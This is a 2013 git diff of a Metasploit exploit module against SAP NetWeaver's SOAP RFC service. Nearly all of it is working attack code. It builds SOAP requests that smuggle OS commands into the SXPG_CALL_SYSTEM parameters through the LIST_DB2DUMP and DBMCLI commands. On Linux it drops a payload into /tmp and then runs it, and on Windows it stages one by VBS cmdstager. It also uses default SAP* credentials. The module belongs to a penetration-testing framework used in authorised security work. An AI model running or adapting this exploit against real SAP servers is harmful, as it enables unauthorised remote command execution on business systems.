Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform

jvazquez-r7 · jvazquez-r7 · commit 24bad9c15cf8 · 2013-05-07T17:03:10.000-05:00
diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -25,102 +25,176 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+
+	Rank = GreatRanking
+
 	include Msf::Exploit::CmdStagerVBS
 	include Msf::Exploit::EXE
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize
 		super(
-			'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution',
+			'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',
 			'Description' => %q{
-								This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the
-								use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in
-								the SM69 transaction.
-								},
+					This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP
+				RFC Service, to execute remote commands. This module needs SAP credentials with
+				privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
+				successfully on Windows 2008 64 bits and Linux 64 bits platforms.
+			},
 			'References' =>
 				[
 					[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
 				],
-			'DisclosureDate' => 'March 26 2013',
-			'Platform' => ['windows'],
-			'Targets' => [['Windows Universal',{'Arch' => ARCH_X64,'Platform' => 'win'}]],
+			'DisclosureDate' => 'Mar 26 2013',
+			'Platform'       => ['win', 'unix'],
+			'Targets' => [
+				[ 'Linux',
+					{
+						'Arch'     => ARCH_CMD,
+						'Platform' => 'unix'
+						#'Payload'  =>
+							#{
+								#'DisableNops' => true,
+								#'Space'       => 232,
+								#'Compat'      =>
+									#{
+										#'PayloadType' => 'cmd',
+										#'RequiredCmd' => 'perl ruby',
+									#}
+							#}
+					}
+				],
+				[ 'Windows x64',
+					{
+						'Arch' => ARCH_X86_64,
+						'Platform' => 'win'
+					}
+				]
+			],
 			'DefaultTarget' => 0,
-			'Privileged' => true,
-			'Author' =>['nmonkee'],
+			'Privileged' => false,
+			'Author' =>
+				[
+					'nmonkee'
+				],
 			'License' => MSF_LICENSE
 		)
 		register_options(
 			[
 				Opt::RPORT(8000),
 				OptString.new('CLIENT', [true, 'SAP Client', '001']),
 				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
-				OptString.new('PASSWORD', [true, 'Password', '06071992']),
-				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
-				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS','Windows NT']])
+				OptString.new('PASSWORD', [true, 'Password', '06071992'])
 			], self.class)
 		register_advanced_options(
 			[
-				OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 250]),
+				OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
 			], self.class)
 	end
-	
+
+	def send_soap_request(data)
+		res = send_request_cgi({
+			'uri' => '/sap/bc/soap/rfc',
+			'method' => 'POST',
+			'data' => data,
+			'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+			'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+			'ctype' => 'text/xml; charset=UTF-8',
+			'headers' => {
+				'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+			},
+			'vars_get' => {
+				'sap-client' => datastore['CLIENT'],
+				'sap-language' => 'EN'
+			}
+		})
+		return res
+	end
+
+	def build_soap_request(command, sap_command, sap_os)
+		data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
+		data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
+		data << "<env:Body>"
+		data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+		data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"
+		data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"
+		data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"
+		data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
+		data << "</n1:SXPG_CALL_SYSTEM>"
+		data << "</env:Body>"
+		data << "</env:Envelope>"
+		return data
+	end
+
+	def check
+		data = rand_text_alphanumeric(4 + rand(4))
+		res = send_soap_request(data)
+		if res and res.code == 500 and res.body =~ /faultstring/
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
+	end
+
 	def exploit
-		linemax = datastore['PAYLOAD_SPLIT']
-		print_status("Using custom payload size of #{linemax}") if linemax != 250
-		print_status("[SAP] #{rhost}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
-		execute_cmdstager({ :delay => 0.35, :linemax => linemax })
-		handler(nil)
+		if target.name =~ /Windows/
+			linemax = datastore['PAYLOAD_SPLIT']
+			vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
+			print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
+			execute_cmdstager({ :delay => 0.35, :linemax => linemax })
+		elsif target.name =~ /Linux/
+			file = rand_text_alphanumeric(5)
+			stage_one = create_unix_payload(1,file)
+			print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
+			res = send_soap_request(stage_one)
+			if res and res.code == 200 and res.body =~ /External program terminated/
+				print_good("#{rhost}:#{rport} - Payload dump was successful")
+			else
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
+			end
+			stage_two = create_unix_payload(2,file)
+			print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
+			send_soap_request(stage_two)
+		end
+	end
+
+	def create_unix_payload(stage, file)
+		command = ""
+		if target.name =~ /Linux/
+			if stage == 1
+				my_payload = payload.encoded.gsub(" ","\t")
+				my_payload.gsub!("&","&amp;")
+				my_payload.gsub!("<","&lt;")
+				command = "-o /tmp/" + file + " -n pwnie" + "\n!"
+				command << my_payload
+				command << "\n"
+			elsif stage == 2
+				command = "-ic /tmp/" + file
+			end
+
+		end
+
+		return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
 	end
 
 	def execute_command(cmd, opts)
-		command = cmd.gsub(/&/,'&amp;')
-		os = datastore['OS']
-		data = '<?xml version="1.0" encoding="utf-8" ?>'
-		data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
-		data << '<env:Body>'
-		data << '<n1:SXPG_CALL_SYSTEM xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
-		data << '<ADDITIONAL_PARAMETERS>&amp;' + command.to_s + '</ADDITIONAL_PARAMETERS>'
-		data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'
-		data << '<OPERATINGSYSTEM>' + os +'</OPERATINGSYSTEM>'
-		data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'
-		data << '</n1:SXPG_CALL_SYSTEM>'
-		data << '</env:Body>'
-		data << '</env:Envelope>'
-		user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+		command = cmd.gsub(/&/, "&amp;")
+		command.gsub!(/%TEMP%\\/, "")
+		data = build_soap_request("&amp;#{command}", "LIST_DB2DUMP", "ANYOS")
 		begin
-			res = send_request_raw({
-				'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
-				'method' => 'POST',
-				'data' => data,
-				'headers' =>{
-					'Content-Length' => data.size.to_s,
-					'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
-					'Authorization' => 'Basic ' + user_pass,
-					'Content-Type' => 'text/xml; charset=UTF-8'
-					}
-				}, 45)
-			if res and res.code != 500 and res.code != 200
-				# to do - implement error handlers for each status code, 404, 301, etc.
-				print_error("[SAP] #{rhost}:#{rport} - something went wrong!")
-				return
-			elsif res and res.body =~ /faultstring/
-				error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
-				0.upto(error.length-1) do |i|
-					print_error("[SAP] #{rhost}:#{rport} - error #{error[i]}")
-				end
-				return
-			elsif res and res.code == 200
+			res = send_soap_request(data)
+			if res and res.code == 200
 				return
 			else
-				print_error("[SAP] #{rhost}:#{rport} - Unknown error")
-				return
+				if res and res.body =~ /faultstring/
+					error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
+					0.upto(error.length-1) do |i|
+						vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
+					end
+				end
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
 			end
 		rescue ::Rex::ConnectionError
-			print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
 		end
-
 	end
 end
